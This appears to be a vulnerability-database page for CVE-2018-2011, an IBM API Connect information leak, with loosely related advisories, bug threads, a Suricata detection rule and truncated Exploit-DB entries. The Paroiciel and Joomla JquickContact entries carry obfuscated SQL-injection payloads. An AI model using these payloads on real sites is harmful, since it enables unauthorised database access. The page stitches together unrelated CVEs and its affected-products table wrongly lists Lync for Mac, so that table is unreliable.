CVE-2018-2011
published 2019-06-25CVE-2018-2011: IBM API Connect 2018.1 through 2018.4.1.5 could allow an attacker to obtain sensitive information from a specially crafted HTTP request that could aid an…
PriorityP429medium5.3CVSS 3.1
AVNACLPRNUINSUCLINAN
EPSS
2.77%
84.6th percentile
IBM API Connect 2018.1 through 2018.4.1.5 could allow an attacker to obtain sensitive information from a specially crafted HTTP request that could aid an attacker in further attacks against the system. IBM X-Force ID: 155150.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ibm | api_connect | — | — |
| ibm | api_connect | — | — |
| ibm | api_connect | 2018.1.0 – 2018.4.1.5 | — |
| msrc | microsoft_lync_for_mac_2011 | — | — |
CVSS provenance
nvdv3.15.3MEDIUMCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
nvdv3.05.3MEDIUMCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
vendor_redhat10.0CRITICAL
vendor_msrc7.5MEDIUM
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-rg86-3c4j-wcqh: IBM API Connect 2018
ghsa_unreviewed·2022-05-24
CVE-2018-2011 [MEDIUM] CWE-200 GHSA-rg86-3c4j-wcqh: IBM API Connect 2018
IBM API Connect 2018.1 through 2018.4.1.5 could allow an attacker to obtain sensitive information from a specially crafted HTTP request that could aid an attacker in further attacks against the system. IBM X-Force ID: 155150.
Red Hat
Mozilla: Privilege escalation through IPC channel messages
vendor_redhat·2019-01-29·CVSS 10.0
CVE-2018-18505 [CRITICAL] CWE-287 Mozilla: Privilege escalation through IPC channel messages
Mozilla: Privilege escalation through IPC channel messages
An earlier fix for an Inter-process Communication (IPC) vulnerability, CVE-2011-3079, added authentication to communication between IPC endpoints and server parents during IPC process creation. This authentication is insufficient for channels created after the IPC process is started, leading to the authentication not being correctly applied to later channels. This could allow for a sandbox escape through IPC channels due to lack of message validation in the listener process. This vulnerability affects Thunderbird < 60.5, Firefox ESR < 60.5, and Firefox < 65.
Package: firefox (Red Hat Enterprise Linux 8) - Not affected
Package: thunderbird (Red Hat Enterprise Linux 8) - Not affected
Microsoft
Lync for Mac 2011 Security Feature Bypass Vulnerability
vendor_msrc·2018-09-11·CVSS 7.5
CVE-2018-8474 [HIGH] Lync for Mac 2011 Security Feature Bypass Vulnerability
Lync for Mac 2011 Security Feature Bypass Vulnerability
Description: A security feature bypass vulnerability exists when Lync for Mac 2011 fails to properly sanitize specially crafted messages. An attacker who successfully exploited this vulnerability could cause a targeted Lync for Mac 2011 user's system to browse to an attacker-specified website or automatically download file types on the operating system's safe file type list.
For an attacker to exploit the vulnerability, a specially crafted message needs to be sent to a targeted user. The targeted user does not need to take any actions after receiving the message.
FAQ: Where do I find the update for Lync for Mac 2011?
Microsoft is not planning on fixing this vulnerability in Microsoft Lync for Mac 2011. Microsoft recommends upgrading
Suricata
ET WEB_CLIENT PDF With Embedded U3D
suricata·2011-12-08
CVE-2018-4989 ET WEB_CLIENT PDF With Embedded U3D
ET WEB_CLIENT PDF With Embedded U3D
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_CLIENT PDF With Embedded U3D"; flow:established,to_client; file.data; content:"obj"; content:"<<"; within:4; content:"/U3D"; fast_pattern; within:64; reference:url,www.adobe.com/support/security/advisories/apsa11-04.html; reference:cve,2018-4989; reference:cve,2018-4987; classtype:bad-unknown; sid:2013995; rev:4; metadata:affected_product Web_Browsers, affected_product Web_Browser_Plugins, attack_target Client_Endpoint, created_at 2011_12_08, cve CVE_2018_4989, deployment Perimeter, signature_severity Major, tag Web_Client_Attacks, updated_at 2024_04_08;)
Exploit-DB
Microsoft Lync for Mac 2011 - Injection Forced Browsing/Download
exploitdb·2018-12-04·CVSS 7.5
CVE-2018-8474 [HIGH] Microsoft Lync for Mac 2011 - Injection Forced Browsing/Download
Microsoft Lync for Mac 2011 - Injection Forced Browsing/Download
---
# Exploit Title: Microsoft Lync for Mac 2011 Injection Forced Browsing/Download
# Author: @nyxgeek - TrustedSec
# Date: 2018-03-20
# Vendor Homepage: microsoft.com
# Software Link: https://www.microsoft.com/en-us/download/details.aspx?id=36517
# CVE: CVE-2018-8474
# Version: Lync:Mac 2011 14.4.3, likely earlier versions
# Tested on: Lync:Mac 2011 14.4.3 (170308)
# Description:
# Force browsing or download via embedded iframe in a chat window. No user
# interaction required. When the iframe contains a web site URL, a new browser
# window of the default browser will open with the URL.
# If the URL is a file, it will download it automatically if it is a permitted
# file type (e.g., zip)
# A write-up can be found at:
# h
Exploit-DB
Paroiciel 11.20 - 'tRecIdListe' SQL Injection
exploitdb·2018-11-12
Paroiciel 11.20 - 'tRecIdListe' SQL Injection
Paroiciel 11.20 - 'tRecIdListe' SQL Injection
---
# Exploit Title: Paroiciel 11.20 - 'tRecIdListe' SQL Injection
# Dork: N/A
# Date: 2018-11-09
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.paroiciel.com/
# Software Link: https://datapacket.dl.sourceforge.net/project/paroiciel/version%2011/par6lus_11_20160225.exe
# Version: 11.20
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/html/trec.php?tRecAction=P&tRecIdListe=[SQL]
#
GET /[PATH]/html/trec.php?tRecAction=P&tRecIdListe=-1%27%20%20UNION%20SELECT%201,(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNin
Exploit-DB
Joomla! Component JquickContact 1.3.2.2.1 - SQL Injection
exploitdb·2018-02-16·CVSS 9.8
CVE-2018-5983 [CRITICAL] Joomla! Component JquickContact 1.3.2.2.1 - SQL Injection
Joomla! Component JquickContact 1.3.2.2.1 - SQL Injection
---
# # # #
# Exploit Title: Joomla! Component JquickContact 1.3.2.2.1 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor: http://coderspirit.blogspot.com.tr/2011/07/jquickcontact.html
# Software: https://extensions.joomla.org/extensions/extension/contacts-and-feedback/contact-forms/jquickcontact/
# Download: https://sourceforge.net/projects/jquickcontact/files/latest/download
# Version: 1.3.2.2.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5983
# # # #
# Exploit Author: Ihsan Sencan
# # # #
#
# POC:
#
# 1)
# http://localhost/[PATH]/index.php?option=com_jquickcontact&task=refresh&sid=[SQL]
#
# dnR0dGo3YXM4MzNvZDVuYTM3OWVlNDAwcDYnJTIwQU5EJTIwRVhUUkFDVFZBTFVFKDIyLENPTkNBVCgweDVjLHZlcnNpb24oKSwoU0VMRU
Bugzilla
CVE-2018-18505 Mozilla: Privilege escalation through IPC channel messages
bugzilla·2019-01-29·CVSS 10.0
CVE-2018-18505 [CRITICAL] CVE-2018-18505 Mozilla: Privilege escalation through IPC channel messages
CVE-2018-18505 Mozilla: Privilege escalation through IPC channel messages
An earlier fix for an Inter-process Communication (IPC) vulnerability, CVE-2011-3079, added authentication to communication between IPC endpoints and server parents during IPC process creation. This authentication is insufficient for channels created after the IPC process is started, leading to the authentication not being correctly applied to later channels. This could allow for a sandbox escape through IPC channels due to lack of message validation in the listener process.
External Reference:
https://www.mozilla.org/en-US/security/advisories/mfsa2019-02/#CVE-2018-18505
Discussion:
Acknowledgments:
Name: the Mozilla project
Upstream: Jed Davis
---
This issue has been addressed in the following products:
Re
Bugzilla
CVE-2018-15919 openssh: User enumeration via malformed packets in authentication requests
bugzilla·2018-08-28·CVSS 5.3
CVE-2018-15919 [MEDIUM] CVE-2018-15919 openssh: User enumeration via malformed packets in authentication requests
CVE-2018-15919 openssh: User enumeration via malformed packets in authentication requests
A flaw was found in OpenSSH versions from 5.9 (September 6, 2011) to the recently released 7.8 (August 24, 2018), inclusive. A remotely observable behaviour in auth-gss2.c could be used by remote attackers to detect existence of users on a target system when GSS2 is in use. Similar to CVE-2018-15473 (it is not a timing attack)
References:
http://seclists.org/oss-sec/2018/q3/180
Discussion:
Created openssh tracking bugs for this issue:
Affects: fedora-all [bug 1623185]
---
Hi everyone, Will this cve be fixed in redhat7 ?
looking for your reply.Thanks.
---
Hi everybody
I didn't find an update for this issue to the RHEL 7.
Is there a fix?
Thanks
---
Is this vulnerability still not fixed? I
http://www.securityfocus.com/bid/108907https://exchange.xforce.ibmcloud.com/vulnerabilities/155150https://www.ibm.com/support/docview.wss?uid=ibm10882932http://www.securityfocus.com/bid/108907https://exchange.xforce.ibmcloud.com/vulnerabilities/155150https://www.ibm.com/support/docview.wss?uid=ibm10882932
2019-06-25
Published